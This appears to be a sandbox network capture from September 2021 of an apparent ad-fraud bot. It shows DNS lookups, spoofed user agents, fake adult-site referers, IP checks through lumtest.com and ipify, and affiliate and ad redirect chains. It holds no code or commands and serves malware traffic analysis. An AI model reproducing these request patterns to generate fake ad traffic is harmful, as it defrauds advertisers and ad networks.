Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:12 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://langmm.info/a.phpRequestGET /a.php HTTP/1.1
Host: langmm.info
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:52:12 GMT
Content-Length: 57783
Connection: close
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:14 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:15 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSstats.g.doubleclick.netRequeststats.g.doubleclick.netIN AResponsestats.g.doubleclick.netIN CNAMEstats.l.doubleclick.netstats.l.doubleclick.netIN A173.194.69.156stats.l.doubleclick.netIN A173.194.69.155stats.l.doubleclick.netIN A173.194.69.154stats.l.doubleclick.netIN A173.194.69.157
-
DNSwidget-mediator.zopim.comRequestwidget-mediator.zopim.comIN AResponsewidget-mediator.zopim.comIN A52.30.76.32widget-mediator.zopim.comIN A52.210.20.70widget-mediator.zopim.comIN A54.76.211.56widget-mediator.zopim.comIN A34.241.82.114widget-mediator.zopim.comIN A54.170.102.227widget-mediator.zopim.comIN A79.125.91.6widget-mediator.zopim.comIN A54.194.36.47widget-mediator.zopim.comIN A52.215.41.90
-
DNSrecaptcha.netRequestrecaptcha.netIN AResponserecaptcha.netIN A216.58.208.99
-
DNSyesde.xyzRequestyesde.xyzIN AResponseyesde.xyzIN A212.107.18.203
-
DNStaskthesa.clubRequesttaskthesa.clubIN AResponsetaskthesa.clubIN A13.227.222.43taskthesa.clubIN A13.227.222.74taskthesa.clubIN A13.227.222.98taskthesa.clubIN A13.227.222.62
-
DNSmasde.liveRequestmasde.liveIN AResponsemasde.liveIN A212.107.18.203
-
DNSbongacams7.comRequestbongacams7.comIN AResponsebongacams7.comIN A94.199.249.164bongacams7.comIN A185.75.253.110
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.102millustry.topIN A13.227.222.73millustry.topIN A13.227.222.110millustry.topIN A13.227.222.89
-
DNSfreychang.funRequestfreychang.funIN AResponsefreychang.funIN A172.67.218.221freychang.funIN A104.21.45.207
-
GEThttp://yesde.xyz/adv.htmlRequestGET /adv.html HTTP/1.1
Host: yesde.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:52:18 GMT
Content-Length: 57786
Connection: close
-
POSThttp://masde.live/adw.phpRequestPOST /adw.php HTTP/1.1
Host: masde.live
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/57.0.3098.106
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:52:18 GMT
Content-Length: 57785
Connection: close
-
GEThttp://millustry.top/redirect?tid=927574RequestGET /redirect?tid=927574 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9895 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://mobileoffcpi.com/gooffer.php?aff_id=123&id_offer=3661&gaid=b30a2366-d14c-4edc-ab7b-8469b6fa58ee&may=22RequestGET /gooffer.php?aff_id=123&id_offer=3661&gaid=b30a2366-d14c-4edc-ab7b-8469b6fa58ee&may=22 HTTP/1.1
Host: mobileoffcpi.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-J260T1 Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.117 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 06 Sep 2021 09:52:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://track.adxmel.com/aff_c?aid=1136301&oid=200580&aff_sub=d4nNHLMuFygjsPJCQZ920AIaUqO1BD&advid=b30a2366-d14c-4edc-ab7b-8469b6fa58ee&source=452
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
-
DNStaskthesa.clubRequesttaskthesa.clubIN AResponsetaskthesa.clubIN A13.227.222.98taskthesa.clubIN A13.227.222.74taskthesa.clubIN A13.227.222.62taskthesa.clubIN A13.227.222.43
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSxnxxxx.ruRequestxnxxxx.ruIN AResponsexnxxxx.ruIN A2.57.89.186
-
DNSfreychang.funRequestfreychang.funIN AResponsefreychang.funIN A104.21.45.207freychang.funIN A172.67.218.221
-
DNSxxxlist.vipRequestxxxlist.vipIN AResponsexxxlist.vipIN A45.77.50.209
-
DNSwww.googletagmanager.comRequestwww.googletagmanager.comIN AResponsewww.googletagmanager.comIN CNAMEwww-googletagmanager.l.google.comwww-googletagmanager.l.google.comIN A216.58.208.104
-
DNSsee-porn.comRequestsee-porn.comIN AResponsesee-porn.comIN A167.86.103.60
-
DNSwww.adspredictiv.comRequestwww.adspredictiv.comIN AResponsewww.adspredictiv.comIN CNAMEadspredictiv.comadspredictiv.comIN A35.190.38.40
-
DNSdelivery.askmediagroup.comRequestdelivery.askmediagroup.comIN AResponsedelivery.askmediagroup.comIN CNAMEorg-362-2c872-dmyt03fgsksh5xx.stackpathdns.comorg-362-2c872-dmyt03fgsksh5xx.stackpathdns.comIN A151.139.240.52
-
DNSlangke.ruRequestlangke.ruIN AResponselangke.ruIN A212.107.18.203
-
GEThttp://xxxlist.vip/index.htmlRequestGET /index.html HTTP/1.1
Host: xxxlist.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:24 GMT
Content-Type: text/html
Content-Length: 276
Last-Modified: Tue, 15 Jun 2021 06:51:19 GMT
Connection: keep-alive
ETag: "60c84de7-114"
Accept-Ranges: bytes
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627608&t=f7d27387232b7fd4&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627608&t=f7d27387232b7fd4&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627608
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:52:24 GMT
Location: https://bongacams7.com/track?v=2&c=602941
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://see-porn.com/click.phpRequestGET /click.php HTTP/1.1
Host: see-porn.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://langke.ru/adilla.htmlRequestGET /adilla.html HTTP/1.1
Host: langke.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:52:24 GMT
Content-Length: 57789
Connection: close
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
DNSwidget-mediator.zopim.comRequestwidget-mediator.zopim.comIN AResponsewidget-mediator.zopim.comIN A54.76.211.56widget-mediator.zopim.comIN A34.241.82.114widget-mediator.zopim.comIN A54.194.36.47widget-mediator.zopim.comIN A52.30.76.32widget-mediator.zopim.comIN A79.125.91.6widget-mediator.zopim.comIN A54.170.102.227widget-mediator.zopim.comIN A52.210.20.70widget-mediator.zopim.comIN A52.215.41.90
-
DNSpetscolect.comRequestpetscolect.comIN AResponsepetscolect.comIN A45.76.17.70
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:29 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:29 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNStaskthesa.clubRequesttaskthesa.clubIN AResponsetaskthesa.clubIN A13.227.222.62taskthesa.clubIN A13.227.222.43taskthesa.clubIN A13.227.222.74taskthesa.clubIN A13.227.222.98
-
DNStaskthesa.clubRequesttaskthesa.clubIN AResponsetaskthesa.clubIN A13.227.222.43taskthesa.clubIN A13.227.222.74taskthesa.clubIN A13.227.222.62taskthesa.clubIN A13.227.222.98
-
DNSxnxxxx.ruRequestxnxxxx.ruIN AResponsexnxxxx.ruIN A2.57.89.186
-
DNSmaodes.comRequestmaodes.comIN AResponsemaodes.comIN A5.181.218.143
-
DNSyaode.liveRequestyaode.liveIN AResponseyaode.liveIN A212.107.18.203
-
DNSyesww.ruRequestyesww.ruIN AResponseyesww.ruIN A212.107.18.203
-
DNSonsanothi.bizRequestonsanothi.bizIN AResponseonsanothi.bizIN A52.222.139.9onsanothi.bizIN A52.222.139.108onsanothi.bizIN A52.222.139.93onsanothi.bizIN A52.222.139.29
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.110millustry.topIN A13.227.222.89millustry.topIN A13.227.222.102millustry.topIN A13.227.222.73
-
GEThttp://yaode.live/go.htmlRequestGET /go.html HTTP/1.1
Host: yaode.live
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:52:30 GMT
Content-Length: 57785
Connection: close
-
GEThttp://yesww.ru/ads.phpRequestGET /ads.php HTTP/1.1
Host: yesww.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:52:30 GMT
Content-Length: 57785
Connection: close
-
GEThttp://elevisions.biz/redirect?tid=931653RequestGET /redirect?tid=931653 HTTP/1.1
Host: elevisions.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://javsex.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=1139e274-5cde-4ab8-a62f-2676f3491e91
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:52:30 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
Location: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGsxTUh3M05qa3hZbVl3TkdGaE9EUXhOemhoWW1Vd1pUZ3hZV0UxT1dZNU9UazBNdy0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXZzZXgsdXMsaW5kZXgsaHRtJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablR1bXFkSzZWMHJxcmJYU3VsZEs2WjBycFhTdWxkTTZWMHJwWFdXeTNYVlhXMHk2VjBUMDAyMjUzVzdjYWNhN1c2M1c3dXQxcDJybG1vc3IwMnI0cHJvMmw0NDI0enQwbHN1NDN1ZGRSTlhWUTd6TkJkMVJuSzV6cFhTdWxkVFM2VjBycFhTdWxjSDJ8aHR0cHwxNTQuNjEuNzEuNTF8VVNBfDQxfGFkLW1hdmVuLmNvbXw1MzEyOTR8NDMwNjc1fDgxNjI2MXwzNTc2NDExfDUwOHw0NTcwMDA2fDU4OTE5MDE0fDE1fDJ8MHwwfDU4OHw5MzE2NTN8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDc4MDk5NTk4NDBiNjMyNDQ4OGE5OGRmYmZjZDhjOThlfDhjNGQ2MDEzNzZiZDZmNDYzZDBmZmRmYThiMDc5ZmU5fDF8MHxqYXZzZXgudXN8MHwwfDB8MC4xNXwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwyfDcyMHx8MHwwfDB8NDR8MHwwfDF8MHxPS3xjNDZhYzQxMGI4ZDczMTY3Mjc0ZDgwMGE1ZDE2N2VhYg--
X-Cache: Miss from cloudfront
Via: 1.1 8dfd7af0583283ff28c8cd8eea759112.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-C1
X-Amz-Cf-Id: pSqR6xQnXEBm-J21FRFs9Hqaig5lKdNrN1BsjYpvIzD3xNSzRI_tbw==
-
GEThttp://millustry.top/redirect?tid=936653RequestGET /redirect?tid=936653 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://gamesnews.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://onsanothi.biz/redirect?tid=929125RequestGET /redirect?tid=929125 HTTP/1.1
Host: onsanothi.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jpsex.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:33 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://alfad.pro/go/266933/622695RequestGET /go/266933/622695 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:35 GMT
Server: nginx
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive
-
DNSapi.ipify.orgRequestapi.ipify.orgIN AResponseapi.ipify.orgIN CNAMEnagano-19599.herokussl.comnagano-19599.herokussl.comIN CNAMEelb097307-934924932.us-east-1.elb.amazonaws.comelb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.248.208elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.239.65elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.235.91.189elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.235.219elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.19.119.155elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.185.207elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.225.219.20elb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.76.7
-
GEThttp://api.ipify.org/RequestGET / HTTP/1.1
Host: api.ipify.org
Connection: keep-alive
Accept-Encoding: gzip,deflate
ResponseHTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Mon, 06 Sep 2021 09:52:35 GMT
Content-Length: 12
Via: 1.1 vegur
-
DNSd3ou4areduq72f.cloudfront.netRequestd3ou4areduq72f.cloudfront.netIN AResponsed3ou4areduq72f.cloudfront.netIN A52.222.137.57d3ou4areduq72f.cloudfront.netIN A52.222.137.79d3ou4areduq72f.cloudfront.netIN A52.222.137.212d3ou4areduq72f.cloudfront.netIN A52.222.137.183
-
DNSsee-porn.comRequestsee-porn.comIN AResponsesee-porn.comIN A167.86.103.60
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSfreeslut.xyzRequestfreeslut.xyzIN AResponsefreeslut.xyzIN A194.59.164.58
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSfinancepark.xyzRequestfinancepark.xyzIN AResponsefinancepark.xyzIN A207.180.237.38
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627603&t=1084adcb41d5d06c&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627603&t=1084adcb41d5d06c&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627603
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:52:36 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627547&t=2ebdfe2be8fed60a&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627547&t=2ebdfe2be8fed60a&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627547
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://see-porn.com/click.phpRequestGET /click.php HTTP/1.1
Host: see-porn.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://alfad.pro/ad/ad?p=266933&w=629197&t=e769e38773111006&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=629197&t=e769e38773111006&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/629197
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:52:36 GMT
Location: https://bongacams7.com/track?v=2&c=602941
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://financepark.xyz/index.htmlRequestGET /index.html HTTP/1.1
Host: financepark.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:35 GMT
Content-Type: text/html
Last-Modified: Wed, 18 Aug 2021 04:10:04 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"611c881c-6db"
Content-Encoding: gzip
-
